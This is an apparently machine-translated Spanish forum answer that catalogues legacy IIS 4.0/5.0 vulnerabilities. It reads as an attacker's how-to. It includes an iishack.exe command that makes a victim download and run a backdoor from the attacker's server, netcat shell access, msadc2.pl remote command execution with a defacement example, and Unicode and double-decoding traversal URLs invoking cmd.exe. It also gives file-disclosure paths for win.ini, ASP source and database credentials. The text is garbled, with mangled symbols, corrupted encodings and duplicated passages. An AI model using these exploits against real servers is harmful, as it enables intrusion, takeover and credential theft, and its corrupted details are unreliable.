Red de conocimiento informático - Conocimiento del nombre de dominio - ¿Cuáles son las vulnerabilidades comunes de la red?

¿Cuáles son las vulnerabilidades comunes de la red?

El alcance de las vulnerabilidades que mencionó es relativamente amplio, ya sean vulnerabilidades de software, vulnerabilidades del sistema, vulnerabilidades del servidor y vulnerabilidades de iis, le hablaré sobre las vulnerabilidades de iis. 1. Desbordamiento del búfer de iis4hack

Existe principalmente en archivos .htr, .idc y .stm. Las solicitudes de URL de estos archivos no realizan una verificación suficiente de los límites del nombre, lo que hace que el atacante inserte el programa de puerta trasera. Descargar y ejecutar programas en el sistema. Para detectar dichos sitios web, necesita dos archivos iishack.exe, ncx.exe (que se pueden encontrar en www.technotronic.com para descargar) y su propio servidor web. Ahora, puede ejecutar el programa de servicio de red en su propio servidor de red, colocar ncx.exe en su directorio correspondiente y luego usar iishack.exe para verificar la máquina de destino:

c:gt;iishack. exe lt;victimgt;80 lt;tu servidor webgt;/ncx.exe

Luego puedes usar netcat para conectarte al servidor que deseas probar:

c:gt;nc lt;victimgt ; 80

Si el punto de desbordamiento es correcto, puede ver la línea de comando de la computadora de destino y obtener altos derechos administrativos. La vulnerabilidad se puede encontrar en iis4hack.zip

2. msadc

Existe una vulnerabilidad en el componente MDAC de IIS que podría permitir a un atacante ejecutar comandos de forma remota en su sistema. El principal problema existe en RDS Datafactory, que de forma predeterminada permite enviar comandos remotos al servidor IIS, que se ejecuta como el usuario del dispositivo (generalmente el valor predeterminado es el usuario del SISTEMA). El programa de usuario es msadc2.pl, veamos su ayuda

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppies /ADM /wiretrip --

Cómo utilizar.

msadc.pl -h lt;hostgt; { -d lt;delaygt; -X -v }

-h lt;hostgt; = Host (IP o dominio) para escanear

-d lt;segundosgt; = Retraso entre llamadas, el valor predeterminado es 1 segundo

-X = Volcar tabla de rutas del servidor de índice (si existe)

-N = Consulta el nombre de VbBusObj NetBIOS

-V = Usar VbBusObj en lugar de ActiveDataFactory

-v = Redundante

-e = Archivo de diccionario externo del paso 5

-ult; \hostsharefilegt; = Usar archivos UNC

-w = Windows 95 en lugar de Windows NT

-c = compatibilidad v1 (consulta de tres pasos)

-s lt;numbergt; = ejecutar solo el paso lt;numbergt;

o -R restaurará la sesión del comando (v2)

[quack@chat quack] $ perl msadc2.pl -h /

-- RDS smack v2 - rain forest cachorro / ADM / wiretrip --

Escriba la línea de comando a ejecutar (se supone que es cmd /c):

cmd /c

Si escribe la línea de comando directamente después de que aparezca cmd /c, puede ejecutar el comando con privilegios del sistema. Por ejemplo, profesor xundi:

echo hackeado por mí gt; d: inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

Ver fuente del archivo

/iisamples/exair/ howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

Ver fuente del archivo

/msadc/samples/selector/showcode.asp?source=/msadc/.../.../.../.../.../.../.../. ./.../.../.../.../winnt/win.ini

5.Null.htw

Ver archivo fuente

/null.htw?CiWebhitsfile=/default.asp20amp;20CiRestriction=none20amp;20amp;CiHiliteType=full

Este es el archivo fuente del archivo. dll & .htw

La función de resaltado de resultados proporcionada por Index Server permite a los usuarios WEB resaltar sus términos de búsqueda originales en un documento cuyo nombre se pasa al archivo .htw a través de la variable CiWebhitsfile. Webhits.dll es una aplicación ISAPI que maneja solicitudes, abre archivos y devuelve resultados. Cuando los usuarios controlan el parámetro CiWebhitsfile pasado a .htw, pueden solicitar cualquier archivo, lo que permite ver el código fuente ASP y otros contenidos de archivos de script.

Para saber si tienes esta vulnerabilidad, puedes solicitar la siguiente entrada:

/nosuchfile.htw Si recibes el siguiente mensaje del servidor:

El formato QUERY_STRING no es válido, lo que significa que esta vulnerabilidad existe. El problema es principalmente que webhits.dll está asociado con una asignación de archivos .htw, por lo que puedes evitar esta vulnerabilidad eliminando

esta asignación, puedes buscar archivos .htw en el sistema que creas que es vulnerable , generalmente se encontrarán los siguientes programas:

/issasamples/issamples/oop/ qfullhit.htw

/issasamples/issamples/oop/qsumrhit.htw

/isssamples/exair /search/qfullhit.htw

/isssamples/exair/ search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (normalmente se utiliza para loopback)

Un atacante puede acceder al contenido de los archivos en el sistema a través de:

/issasamples/issamples/oop/oop/iirturnh.htw

/isssamples /issamples/oop/ oop/iirturnh.htw issamples/oop/qfullhit.htw?

ciwebhitsfile=/.../.../winnt/win.iniamp;cirestriction=noneamp;cihilitetype=full

En los sistemas donde existe la vulnerabilidad, aparecerá en el contenido del archivo win.ini. 7. Flujo de datos alternativo ASP (::$DATA) Para ver el contenido de algunos archivos .asp, puede solicitar la siguiente URL: /default.asp::$DATA y obtendrá el código fuente

8. Error de punto ASP

Agregar uno o más puntos al final de la URL solicitada puede provocar una fuga del código fuente ASP.

/sample.asp.

9.ISM.DLL

La vulnerabilidad fue descubierta por primera vez por el equipo de seguridad de la información de Cerberus. Se ejecuta en IIS 4.0 y 5.0 y permite a los atacantes ver el contenido de archivos arbitrarios y código fuente. Al acercarse a 230 o 20? (que representa espacios) y agregar ?.htr? a la solicitud especial a IIS, IIS piensa que el cliente está solicitando un archivo ?.htr? asignado a la aplicación ISAPI ISM.DLL para que IIS pase la solicitud .htr al archivo DLL. La solicitud htr se pasa al archivo DLL y luego el programa ISM.DLL abrirá y ejecutará el archivo pasado, pero antes de que ISM.DLL trunque la información, el búfer envía un .Htr truncado y tiene algo de tiempo para devolver el contenido del archivo. ismo. El búfer envía un .Htr truncado y tiene algo de tiempo para devolver el contenido del archivo a ISM.DLL antes de que ISM.DLL trunque la información. Este ataque solo se puede realizar una vez a menos que el servicio de red se haya detenido y reiniciado. Este ataque fallará si ya se ha enviado una solicitud .htr a la máquina. Sólo funciona cuando ISM.DLL se carga por primera vez en la memoria. CNNS descubrió que agregar el signo " " para evitar un solo ataque es problemático y permite múltiples ataques.

/global.asa2020(...lt;=230)global.asa.htr

Vulnerabilidad 10..idcamp;.ida

Esta vulnerabilidad es en realidad, es similar a la vulnerabilidad del punto ASP y se puede utilizar en IIS 4.

Esta vulnerabilidad es en realidad similar a la vulnerabilidad del punto ASP. Puede mostrar la información de su directorio WEB en IIS 4.0. se mostrará en IIS 5.0. También se han encontrado algunas de estas vulnerabilidades. Al agregar el sufijo ?idc? o ?ida?, IIS intentará permitir que .IDC se ejecute a través del programa de conexión de base de datos .DLL. existe, devolverá parte de la información al cliente.

/anything.idc o cualquier cosa.idq

11. Errores .htr

Las solicitudes que agregan URL .htr a algunos ASA y ASP pueden generar código fuente de archivo. fuga:

/global.asa .htr

12. Ejemplo de anuncio del servidor del sitio

/anything.idc o cualquier cosa.idq

11. Error .htr

Las solicitudes adjuntas a las URL .htr de algunos ASA y ASP pueden provocar una fuga del código fuente del archivo. Ejemplo de servidor de sitio

Al solicitar site.csc, que normalmente se almacena en /adsamples/config/site.csc, un atacante puede acceder a información como DSN, UID y PASS en la base de datos, por ejemplo:

/adsamples/ config/site.csc

13./iisadmpwd

IIS4.0 contiene una característica interesante que permite a usuarios remotos atacar cuentas de usuario en el servidor web. Es decir, su servidor web se traduce a una dirección a través de NAT y aún puede ser atacado. Cada instalación de IIS4.0 crea un directorio virtual /iisadmpwd, que contiene muchos archivos .htr, lo que permite a usuarios anónimos acceder a estos archivos que no están especificados solo en la dirección de bucle invertido (127.0.0.1), en la ventana emergente Al solicitar Estos archivos en el cuadro de diálogo, la cuenta del usuario y la contraseña se pueden cambiar a través de la WEB. Este directorio está asignado físicamente al siguiente directorio:

c:winntsystem32inetsrviisadmpwd

Achg.htr

Aexp.htr

Aexp2.htr

p>

Aexp2b.htr

Aexp3.htr

Aexp4.htr

Aexp4b.htr

Anot .htr

p>

Anot3.htr

Este método permite a un atacante adivinar su contraseña por fuerza bruta.

14.Translate: f vulnerabilidad

Hay una fuga de código fuente de archivo asp en WebDAV en las extensiones OFFICE 2000 y FRONTPAGE 2000Server cuando alguien solicita ASP/ASA o cualquier otro script arbitrario. , Si agrega el sufijo Translate:f al HTTP GET y agrega / al final del archivo solicitado, se mostrará el código del archivo, siempre que, por supuesto, no se haya aplicado el parche WIN2K SP1.

Esta es una vulnerabilidad de W2K, pero como FP2000 también está instalado en IIS4.0, IIS4.0 también es vulnerable. Programas de explotación: trasn1.pl, trans2.pl

15.Unicode

IIS 4.0 e IIS 5.0 tienen vulnerabilidades de seguridad al realizar la decodificación de caracteres Unicode, lo que permite a los usuarios ejecutar de forma remota a través de IIS cualquier comando . Cuando IIS abre un archivo, si el nombre del archivo contiene caracteres Unicode, se decodifica, lo que puede provocar que IIS abra o ejecute incorrectamente archivos fuera del directorio raíz web si el usuario proporciona alguna codificación especial.

/scripts/...c11c.../winnt/system32/cmd.exe?/c dir

/scripts/...c0af...c0af... /winnt/system32/cmd.exe?/c dir

/scripts/...c19c...c19c.../winnt/system32/cmd.exe?/c dir

/a.asp/...c11c.../...c11c.../winnt/win.ini

Es posible que necesites consultar los siguientes directorios

OBTENER

p>

/scripts/...c0af...c0af...c0af...c0af.../winnt/system32/cmd.exe?/c dir c:\

HTTP /1.0rnrn

OBTENER

/msadc/...c0af...c0af...c0af...c0af...c0af...c0af ...c0af ../winnt/system32/cmd.exe?/c dir c:\

HTTP/1.0rnrn

GET

/_vti_bin. /...c0af ...c0af...c0af.../winnt/system32/cmd.exe?/c dir c:\

HTTP/1.0rnrn

GET

/_mem_bin/...c0af...c0af...c0af.../winnt/system32/cmd.exe?/c dir c:\

HTTP/1.0 rnrn

OBTENER

/cgi-bin/...c0af...c0af...c0af.../winnt/system32/cmd.exe?/c dir c: \

HTTP/1.0rnrn

eeye desarrolló el kit de herramientas iishack1.5 para probar esta vulnerabilidad

16. Desbordamiento del buffer de iis5.0

Microsoft Win La interfaz de extensión ISAPI de impresión de 2K IIS

5 establece una asignación de la extensión .printer a msw3prt.dll, que existe de forma predeterminada. Cuando un usuario remoto envía una solicitud URL para una impresora, IIS

5 llama a msw3prt.dll para interpretar la solicitud.

Debido a que msw3prt.dll carece de una verificación adecuada de los límites del búfer, un usuario remoto puede enviar una solicitud URL .printer cuidadosamente construida donde el campo "Host:" contiene aproximadamente 420 bytes de datos, lo que genera un desbordamiento típico del almacenamiento en búfer en el área de msw3prt.dll, lo que potencialmente permite la ejecución. de código arbitrario. Después de que se produce el desbordamiento, el servicio WEB dejará de responder. Win 2K puede verificar si el servicio WEB deja de responder y reiniciarlo automáticamente, por lo que es difícil para el administrador del sistema darse cuenta de que se ha producido el ataque. Para conocer los exploits, consulte iis5hack.zip

17. Vulnerabilidad de decodificación secundaria del nombre de archivo CGI de IIS

IIS se decodifica dos veces al cargar un programa CGI ejecutable. La primera vez que el nombre del archivo CGI se decodifica como "etc." Una vez pasada la verificación del nombre del archivo, IIS lo decodificará por segunda vez. Normalmente, sólo se deben decodificar los parámetros de CGI, pero IIS decodifica por error el nombre del archivo CGI decodificado junto con los parámetros CGI. Por lo tanto, el nombre del archivo CGI se decodifica incorrectamente dos veces.

Al construir cuidadosamente un nombre de archivo CGI, un atacante puede eludir las comprobaciones de seguridad de IIS en los nombres de archivos, como las comprobaciones ". /" o "./", y, bajo ciertas condiciones, el atacante puede ejecutar cualquier sistema. dominio.

Por ejemplo, para el carácter '', la codificación normal es 5c. Las codificaciones correspondientes de estos tres caracteres son:

'' = 25

'5 ' = 35

'c' = 63

Para volver a codificar estos tres caracteres, existen varias formas, como por ejemplo:

255c

35c

3563

253563

...

Por lo tanto, "..." se puede representar como "... 255c" o "... 35c", y así sucesivamente. Después de decodificarlo por primera vez, se convierte en "...5c". IIS considerará esto como una cadena normal y no violará los controles de seguridad. Después de decodificarlo por segunda vez, se convierte en "...". Por lo tanto, un atacante puede utilizar "..." para recorrer directorios y ejecutar programas arbitrarios fuera del directorio de red. Bien, eso es todo. . . . . Hay tantas lagunas, pero Microsoft sigue siendo el primero, tiene una amplia gama de usuarios y el segundo, XXX jajaja.